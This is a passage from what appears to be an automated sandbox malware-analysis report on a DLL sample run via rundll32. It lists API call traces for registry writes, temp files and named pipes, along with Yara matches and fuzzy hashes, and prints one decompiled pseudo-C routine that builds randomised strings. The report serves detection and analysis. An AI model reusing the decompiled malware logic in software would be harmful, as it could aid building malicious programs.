                          • ReleaseMutex.KERNEL32(?), ref: 05B6541A
                          • RtlExitUserThread.NTDLL(?), ref: 05B65430
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                          • String ID:
                          • API String ID: 4037736292-0
                          • Opcode ID: de59c74dd7dc0c953c2d5c93c45c60e15a9d392318d0779ef97f284fd15bada1
                          • Instruction ID: 07358ac2835d68353fb45ff16e9169879937d85251b2a0b84704cc02db016fc1
                          • Opcode Fuzzy Hash: de59c74dd7dc0c953c2d5c93c45c60e15a9d392318d0779ef97f284fd15bada1
                          • Instruction Fuzzy Hash: 22618C71518700AFC7209F25D849A2BBBEAFF84B11F809A59F5A6D31C0EBB4F415CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6D9F6 Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000,76C85520,?,00000000,?,?,?), ref: 05B6DA0C
                          • lstrlen.KERNEL32(?), ref: 05B6DA14
                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05B6DA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B6DA43
                          • lstrlen.KERNEL32(?), ref: 05B6DA58
                          • lstrlen.KERNEL32(?), ref: 05B6DA66
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 05B6DAB4
                          • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 05B6DAD8
                          • lstrlen.KERNEL32(?), ref: 05B6DB0B
                          • HeapFree.KERNEL32(00000000,?,?), ref: 05B6DB36
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 05B6DB4D
                          • HeapFree.KERNEL32(00000000,?,?), ref: 05B6DB5A
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                          • String ID:
                          • API String ID: 904523553-0
                          • Opcode ID: 7636d555669ad68465ad9868eaee47ccb0c20c54d003194b938bbe05d92e75dc
                          • Instruction ID: 409cfa70d71516baa22fe663bcb7a436169bae71b7dd4a17f79085ff5ac8eb6f
                          • Opcode Fuzzy Hash: 7636d555669ad68465ad9868eaee47ccb0c20c54d003194b938bbe05d92e75dc
                          • Instruction Fuzzy Hash: 88416872A00249BFCF119FA0CC84EAE7BBAFB44310F1884A6F915A7150DB35F911DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B71FE9 Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 05B7201B
                          • WaitForSingleObject.KERNEL32(000005BC,00000000), ref: 05B7203D
                          • ConnectNamedPipe.KERNEL32(?,?), ref: 05B7205D
                          • GetLastError.KERNEL32 ref: 05B72067
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05B7208B
                          • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 05B720CE
                          • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 05B720D7
                          • WaitForSingleObject.KERNEL32(00000000), ref: 05B720E0
                          • CloseHandle.KERNEL32(?), ref: 05B720F5
                          • GetLastError.KERNEL32 ref: 05B72102
                          • CloseHandle.KERNEL32(?), ref: 05B7210F
                          • RtlExitUserThread.NTDLL(000000FF), ref: 05B72125
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                          • String ID:
                          • API String ID: 4053378866-0
                          • Opcode ID: 097dabcc160a3914b3e55a7a9d2267e478b2a01534ce1cfdbc422e67292a8a3c
                          • Instruction ID: 563a306b59ed76b0c31b1d9dca1cd83a5353d566644584a649204f3d6f498996
                          • Opcode Fuzzy Hash: 097dabcc160a3914b3e55a7a9d2267e478b2a01534ce1cfdbc422e67292a8a3c
                          • Instruction Fuzzy Hash: 96317E74414309BFD720AF24C84997EBFAAFF44324F105A29F966D21E0DB70B945CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B74140 Relevance: 18.1, APIs: 12, Instructions: 95registrymemorystringCOMMON
                          Download Yara Rule
                          APIs
                          • RtlImageNtHeader.NTDLL(?), ref: 05B74151
                          • GetTempPathA.KERNEL32(00000000,00000000,?,?,05B709CF,00000094,00000000,00000000,?), ref: 05B74169
                          • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 05B74178
                          • GetTempPathA.KERNEL32(00000001,00000000,?,?,05B709CF,00000094,00000000,00000000,?), ref: 05B7418B
                          • GetTickCount.KERNEL32 ref: 05B7418F
                          • wsprintfA.USER32 ref: 05B741A6
                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05B741E1
                          • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 05B74201
                          • lstrlen.KERNEL32(00000000), ref: 05B7420B
                          • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 05B7421B
                          • RegCloseKey.ADVAPI32(?), ref: 05B74227
                          • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 05B74235
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                          • String ID:
                          • API String ID: 3778301466-0
                          • Opcode ID: 40270215d0af5c4e5c1f426306cedf5337446d66864304c7b29fef8834a4eae8
                          • Instruction ID: 9aa33ebd6a862cae38fb6da94a75cf4fb6d05466362b148525d3500f960c9e4f
                          • Opcode Fuzzy Hash: 40270215d0af5c4e5c1f426306cedf5337446d66864304c7b29fef8834a4eae8
                          • Instruction Fuzzy Hash: 5A3166B1420218BFDB10AFA4EC89DBF7FAEEB05395B115062F916D7100DA34BA11DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B65093 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                          Download Yara Rule
                          APIs
                          • RtlImageNtHeader.NTDLL(00000000), ref: 05B650BD
                          • GetCurrentThreadId.KERNEL32 ref: 05B650D3
                          • GetCurrentThread.KERNEL32 ref: 05B650E4
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B7509E
                            • Part of subcall function 05B7508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750B7
                            • Part of subcall function 05B7508C: GetCurrentThreadId.KERNEL32 ref: 05B750C4
                            • Part of subcall function 05B7508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750D0
                            • Part of subcall function 05B7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05B65112,00000000,?,00000000,00000000,?), ref: 05B750DE
                            • Part of subcall function 05B7508C: lstrcpy.KERNEL32(00000000), ref: 05B75100
                            • Part of subcall function 05B80551: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,05B6512E,00000020,00000000,?,00000000), ref: 05B805BC
                            • Part of subcall function 05B80551: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,76C85520,00000000,?,05B6512E,00000020,00000000,?,00000000), ref: 05B805E4
                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 05B6515E
                          • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 05B6516A
                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05B651B9
                          • wsprintfA.USER32 ref: 05B651D1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 05B651DC
                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 05B651F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                          • String ID: W
                          • API String ID: 630447368-655174618
                          • Opcode ID: cb149e7a193d3cad1c57d714e2dff35522b1f06b524a022116f335821b409a89
                          • Instruction ID: c0ef3ae981d4fdac83dae6b12fb6388a1345346db0e5492bb154c9a4ca838450
                          • Opcode Fuzzy Hash: cb149e7a193d3cad1c57d714e2dff35522b1f06b524a022116f335821b409a89
                          • Instruction Fuzzy Hash: 43416A70910118BFCB22AFA0DC49DBE7FBAFF05750B644066F90597190EB38B664DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B7B804 Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B7B82F
                            • Part of subcall function 05B7447B: RegCloseKey.ADVAPI32(?,?), ref: 05B74502
                          • RegOpenKeyA.ADVAPI32(80000001,05B74833,?), ref: 05B7B86A
                          • lstrcpyW.KERNEL32(-00000002,94E85600), ref: 05B7B8CC
                          • lstrcatW.KERNEL32(00000000,?), ref: 05B7B8E1
                          • lstrcpyW.KERNEL32(?), ref: 05B7B8FB
                          • lstrcatW.KERNEL32(00000000,?), ref: 05B7B90A
                            • Part of subcall function 05B7452B: lstrlenW.KERNEL32(?,?,?,05B6E51D,?,?,?,?,00001000,?,?,00001000), ref: 05B7453E
                            • Part of subcall function 05B7452B: lstrlen.KERNEL32(?,?,05B6E51D,?,?,?,?,00001000,?,?,00001000), ref: 05B74549
                            • Part of subcall function 05B7452B: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 05B7455E
                          • RegCloseKey.ADVAPI32(05B74833,?,?,05B74833), ref: 05B7B974
                            • Part of subcall function 05B6C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,05B6171E,?,?,00000000,?), ref: 05B6C2B6
                            • Part of subcall function 05B6C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,05B6171E,?,?,00000000,?), ref: 05B6C2DE
                            • Part of subcall function 05B6C2AA: memset.NTDLL ref: 05B6C2F0
                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,05B74833), ref: 05B7B9A9
                          • GetLastError.KERNEL32(?,?,05B74833), ref: 05B7B9B4
                          • HeapFree.KERNEL32(00000000,00000000,?,?,05B74833), ref: 05B7B9CA
                          • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,?,?,05B74833), ref: 05B7B9DC
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                          • String ID:
                          • API String ID: 1430934453-0
                          • Opcode ID: fe2f9fd195f52c73c8d48cfe8b1b479f4ddb6c3b0fdacfe8b21df95461ab29b6
                          • Instruction ID: 9139fb63d3d2fc1ebd41cb30d05befe5ee1141aeb741162190421a2466bdfeb5
                          • Opcode Fuzzy Hash: fe2f9fd195f52c73c8d48cfe8b1b479f4ddb6c3b0fdacfe8b21df95461ab29b6
                          • Instruction Fuzzy Hash: 6C514871910109FBDB11EBA4DC49EBE7BBAFF44354B101096F925A7150EB35BA02DFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 010062F6 Relevance: 16.6, APIs: 11, Instructions: 145stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 55%
                          			E010062F6(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				WCHAR* _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				WCHAR* _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				WCHAR* _t125;

				_t58 =  *0x100a3dc; // 0x5299c18
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E01007367();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E01007367();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E0100117A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E0100117A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E010067E7(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x100918c;
						}
						_t70 = E0100659E(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E01006D63(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x100a348; // 0x428d5a8
								_t28 = _t105 + 0x100bb30; // 0x530025
								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E010067E7(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x1009190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E01006D63(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E01006C2C(_v24);
								} else {
									_t92 =  *0x100a348; // 0x428d5a8
									_t44 = _t92 + 0x100bca8; // 0x73006d
									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E01006C2C(_v8);
						}
						E01006C2C(_v12);
					}
					E01006C2C(_v16);
				}
				return _v28;
			}


































                          0x010062fc
                          0x01006304
                          0x01006307
                          0x01006314
                          0x01006317
                          0x0100631e
                          0x01006325
                          0x01006328
                          0x01006335
                          0x01006338
                          0x0100633b
                          0x01006340
                          0x01006345
                          0x0100634d
                          0x01006352
                          0x01006357
                          0x0100635d
                          0x01006361
                          0x0100636a
                          0x0100636e
                          0x01006370
                          0x01006370
                          0x01006378
                          0x0100637d
                          0x01006382
                          0x01006388
                          0x0100638f
                          0x010063a0
                          0x010063a7
                          0x010063b9
                          0x010063be
                          0x010063c3
                          0x010063cc
                          0x010063de
                          0x010063f4
                          0x010063f9
                          0x010063fd
                          0x01006401
                          0x01006406
                          0x0100640b
                          0x0100640d
                          0x0100640d
                          0x01006417
                          0x01006420
                          0x01006427
                          0x01006443
                          0x01006447
                          0x01006480
                          0x01006449
                          0x0100644c
                          0x01006454
                          0x01006465
                          0x0100646d
                          0x01006475
                          0x01006479
                          0x01006479
                          0x01006447
                          0x01006488
                          0x01006488
                          0x01006490
                          0x01006490
                          0x01006498
                          0x01006498
                          0x010064a4

                          APIs
                          • GetTickCount.KERNEL32 ref: 0100630E
                          • lstrlen.KERNEL32(00000000,00000005), ref: 0100638F
                          • lstrlen.KERNEL32(?), ref: 010063A0
                          • lstrlen.KERNEL32(00000000), ref: 010063A7
                          • lstrlenW.KERNEL32(80000002), ref: 010063AE
                          • wsprintfW.USER32 ref: 010063F4
                          • lstrlen.KERNEL32(?,00000004), ref: 01006417
                          • lstrlen.KERNEL32(?), ref: 01006420
                          • lstrlen.KERNEL32(?), ref: 01006427
                          • lstrlenW.KERNEL32(?), ref: 0100642E
                          • wsprintfW.USER32 ref: 01006465
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrlen$wsprintf$CountFreeHeapTick
                          • String ID:
                          • API String ID: 822878831-0
                          • Opcode ID: 4bf31ccc0f4e538e4634c7b04550bc6a6e35f1a5a37b228da9dc5cb3e12e8768
                          • Instruction ID: 927cf494d53ff7b79cb758e6b816b67c2d4c5e5c5affe412dca714ed8ee8019c
                          • Opcode Fuzzy Hash: 4bf31ccc0f4e538e4634c7b04550bc6a6e35f1a5a37b228da9dc5cb3e12e8768
                          • Instruction Fuzzy Hash: EC516072D0021AABEF13AFA4DC44ADE7FB6EF44314F058065F944A7291DB36DA21DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B75353 Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 05B75389
                          • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 05B7539E
                          • RegCreateKeyA.ADVAPI32(80000001,?), ref: 05B753C6
                          • HeapFree.KERNEL32(00000000,?), ref: 05B75407
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B75417
                          • RtlAllocateHeap.NTDLL(00000000,05B6DA9D), ref: 05B7542A
                          • RtlAllocateHeap.NTDLL(00000000,05B6DA9D), ref: 05B75439
                          • HeapFree.KERNEL32(00000000,00000000,?,05B6DA9D,00000000,?,?,?), ref: 05B75483
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,05B6DA9D,00000000,?,?,?,?), ref: 05B754A7
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,05B6DA9D,00000000,?,?,?), ref: 05B754CC
                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,05B6DA9D,00000000,?,?,?), ref: 05B754E1
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Free$Allocate$CloseCreate
                          • String ID:
                          • API String ID: 4126010716-0
                          • Opcode ID: 8c10203489845acb23d231993a45f872d683925e554b4a9d54da9d80d50370ce
                          • Instruction ID: bd18871189bcf9c712ad9c069ebf08fdc8c54a4699753718653745315dc94d7a
                          • Opcode Fuzzy Hash: 8c10203489845acb23d231993a45f872d683925e554b4a9d54da9d80d50370ce
                          • Instruction Fuzzy Hash: E951C2B581020DEFDF119F94D8858EEBFBAFB08315F10446AF525A2160D735AA94EF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6CEC3 Relevance: 16.6, APIs: 11, Instructions: 121memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • PathFindFileNameW.SHLWAPI(?), ref: 05B6CEDD
                          • PathFindFileNameW.SHLWAPI(?), ref: 05B6CEF3
                          • lstrlenW.KERNEL32(00000000), ref: 05B6CF36
                          • RtlAllocateHeap.NTDLL(00000000,05B8350B), ref: 05B6CF4C
                          • memcpy.NTDLL(00000000,00000000,05B83509), ref: 05B6CF5F
                          • _wcsupr.NTDLL ref: 05B6CF6B
                          • lstrlenW.KERNEL32(?,05B83509), ref: 05B6CFA4
                          • RtlAllocateHeap.NTDLL(00000000,?,05B83509), ref: 05B6CFB9
                          • lstrcpyW.KERNEL32(00000000,?), ref: 05B6CFCF
                          • lstrcatW.KERNEL32(00000000,?), ref: 05B6CFF5
                          • HeapFree.KERNEL32(00000000,00000000), ref: 05B6D004
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                          • String ID:
                          • API String ID: 3868788785-0
                          • Opcode ID: d547a6b720875944b8217725f78568d6d0a7ab9c70bd1ca1eb997f8802cad5b1
                          • Instruction ID: 6b5a76d91cbf255bb34c962515d19d2a49a1ed3ef7a80a07bb89b7e472634957
                          • Opcode Fuzzy Hash: d547a6b720875944b8217725f78568d6d0a7ab9c70bd1ca1eb997f8802cad5b1
                          • Instruction Fuzzy Hash: B4311332224605BFC730AE749C8997F7FAAFB49220B14095AF656D7180DF39B809CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B6161A Relevance: 16.6, APIs: 11, Instructions: 102registrymemorystringCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05B6163E
                            • Part of subcall function 05B7447B: RegCloseKey.ADVAPI32(?,?), ref: 05B74502
                          • lstrcmpiW.KERNEL32(?,?,?,?,00000000,?,00000000,?), ref: 05B6166D
                          • lstrlenW.KERNEL32(?,?,?,00000000,?,00000000,?), ref: 05B6167E
                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 05B616B8
                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00000000,?), ref: 05B616DA
                          • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 05B616E3
                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 05B616F9
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 05B6170E
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05B61722
                          • HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 05B61737
                          • RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 05B61740
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenValuelstrcmpilstrlen
                          • String ID:
                          • API String ID: 534682438-0
                          • Opcode ID: fcfd9d2303d2616452216e3c1e6028bc1669dee8b2c2812ed8357f37bec6cc22
                          • Instruction ID: 568074caafd3df7fa925e9043e7783ae4049ec522ec84c4077180d1d6060d70b
                          • Opcode Fuzzy Hash: fcfd9d2303d2616452216e3c1e6028bc1669dee8b2c2812ed8357f37bec6cc22
                          • Instruction Fuzzy Hash: 92313675510108BFCB219FA8DC89CBE7FBAFB48350B145052F606E3050EB36BA45EB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B733CD Relevance: 16.6, APIs: 11, Instructions: 80memoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 05B733E4
                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,05B70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,05B6C1F8,00000000,00000094), ref: 05B733F6
                          • StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,05B70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,05B6C1F8,00000000,00000094), ref: 05B73403
                          • wsprintfA.USER32 ref: 05B7341E
                          • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,?,05B6C1F8,00000000,00000094,00000000), ref: 05B73434
                          • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 05B7344D
                          • WriteFile.KERNEL32(00000000,00000000), ref: 05B73455
                          • GetLastError.KERNEL32 ref: 05B73463
                          • CloseHandle.KERNEL32(00000000), ref: 05B7346C
                          • GetLastError.KERNEL32(?,00000000,?,05B70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,05B6C1F8,00000000,00000094,00000000), ref: 05B7347D
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,05B70B6B,00000094,00000000,00000001,00000094,00000000,00000000,?,05B6C1F8,00000000,00000094), ref: 05B7348D
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
                          • String ID:
                          • API String ID: 3873609385-0
                          • Opcode ID: f0e6a68ac107ba640785c82094f849583284b7e1d7d87cafc07665fa24563e37
                          • Instruction ID: 0e305ae57da6a7abcf9476b1b6bfd4ca3d1cdb1e0933d803977d5e90a00e89f7
                          • Opcode Fuzzy Hash: f0e6a68ac107ba640785c82094f849583284b7e1d7d87cafc07665fa24563e37
                          • Instruction Fuzzy Hash: 3911C071150218BFD3222A64AC8EE7B3F9EEB02365B001465F916D3180DE217C49E6B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B67FFF Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • StrChrA.SHLWAPI(00000000,0000002C,765BD3B0,00000000,76C85520,76CDF710), ref: 05B68030
                          • StrChrA.SHLWAPI(00000001,0000002C), ref: 05B68043
                          • StrTrimA.SHLWAPI(00000000,?), ref: 05B68066
                          • StrTrimA.SHLWAPI(00000001,?), ref: 05B68075
                          • lstrlen.KERNEL32(00000000), ref: 05B680AA
                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 05B680BD
                          • lstrcpy.KERNEL32(00000004,00000000), ref: 05B680DB
                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05B680FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                          • String ID: W
                          • API String ID: 1974185407-655174618
                          • Opcode ID: 33117e9d5581e4b20abd88eb5753733ce3168702b7f942e7c4f4ea10ba7dda9c
                          • Instruction ID: 5f1eb59c12970eebfe0d8b44659ce607441a3145c683e929289d27de5f82ec21
                          • Opcode Fuzzy Hash: 33117e9d5581e4b20abd88eb5753733ce3168702b7f942e7c4f4ea10ba7dda9c
                          • Instruction Fuzzy Hash: 88315C75910218FFCB119BA8CC49EAA7FFAFF09750F245096B90597240EA78B941DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 05B73C97 Relevance: 15.2, APIs: 10, Instructions: 186stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(05FBC1E8,00000000,00000000,00000000,?), ref: 05B73CBA
                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05B73CC9
                          • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 05B73CD6
